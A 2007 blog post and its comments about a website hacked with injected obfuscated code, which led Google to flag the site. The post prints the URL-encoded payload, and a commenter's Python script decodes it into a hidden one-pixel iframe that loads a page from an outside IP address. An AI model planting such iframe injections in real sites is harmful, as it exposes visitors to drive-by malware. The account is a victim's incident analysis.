Website security compromised

March 30th, 2007 at 17:25 · Filed Under Call Me a Geek, Critiques, Hacking 

I noticed a drastic reduce of visitors to my website in February and March. I was wondering what was happening. On March 8, I suddenly received a notification email from Google Search Quality team informing that my website was a hazard to visitors and it might contain some malware or badware. I was shocked to know about it and I Googled for my site and found that my sites had been tagged “This site may harm your computer” and visitors could not access to my website following the link from Google search page.

With the help from my hosting provider, I found a piece of malicious obfuscated code in JavaScript had been intentionally embedded into one of the .PhP file. Part of the obfuscated code read like this:


%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E

I removed the malicious code from my .PhP script file and informed Google team. It really took them quite some time to remove my website from their list. A moment ago, I found out that my site has been de-listed from Google’s list of malicious websites.

Ironically, today I received an announcement from my web hosting provider that they implement HackerSafe Certification on all websites hosted with them. Here’s a snapshot of their newsletter:

I am all tied up to carefully inspect and decipher the code. Any taker?

Tags:

Comments

3 Responses to “Website security compromised”

  • Tero Koskinen on April 2nd, 2007 16:01 1

    %3C%69… seem to be simple hex values. Put them in a table and print them to find out the clear text form.

    A python script example:

    table = [ 0x3C, 0x69, 0x66, 0x72, 0x61, 0x6D, 0x65, 0x20, 0x73, 0x72, 0x63, 0x3D, 0x20, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x38, 0x31, 0x2E, 0x39, 0x35, 0x2E, 0x31, 0x34, 0x36, 0x2E, 0x39, 0x38, 0x2F, 0x69, 0x6E, 0x64, 0x65, 0x78, 0x2E, 0x68, 0x74, 0x6D, 0x6C, 0x20, 0x66, 0x72, 0x61, 0x6D, 0x65, 0x62, 0x6F, 0x72, 0x64, 0x65, 0x72, 0x3D, 0x22, 0x30, 0x22, 0x20, 0x77, 0x69, 0x64, 0x74, 0x68, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x68, 0x65, 0x69, 0x67, 0x68, 0x74, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x73, 0x63, 0x72, 0x6F, 0x6C, 0x6C, 0x69, 0x6E, 0x67, 0x3D, 0x22, 0x6E, 0x6F, 0x22, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x63, 0x6F, 0x75, 0x6E, 0x74, 0x65, 0x72, 0x3E, 0x3C, 0x2F, 0x69, 0x66, 0x72, 0x61, 0x6D, 0x65, 0x3E ]

    html = “”

    for a in table:
    print “%d (%c)” % (a,chr(a))
    html = html + chr(a)

    print “HTML: %s” % html

    ## end of script

    (I hope your blog doesn’t mangle the formatting of the script too badly.)

  • Adrian Hoe on April 3rd, 2007 1:26 2

    tkoskine,

    Thanks for the Python script. The obfuscated code, after deciphering, reads like this:

    [iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter][/iframe]

    I replaced the angle brackets with square brackets to avoid the browser to interpret the entire line. I traced the IP address to Panama.

  • kimwooi on April 3rd, 2007 18:28 3

    I faced the same problem on my own source codes before but we found that the intrusion is come from the virus access via samba from the windows OS to the linux servers as one of our people’s PC get infected with a virus called “熊貓燒香”. It attack all the .php files that the folder he had open and added a line of iframe text to my php’s files.

    When those source code are loaded, it automatically diverted to another website of not my own as the iframe has a javascript to ask the parent frame to redirect to another website.

    A pretty bad experience ya..:)

Leave a Reply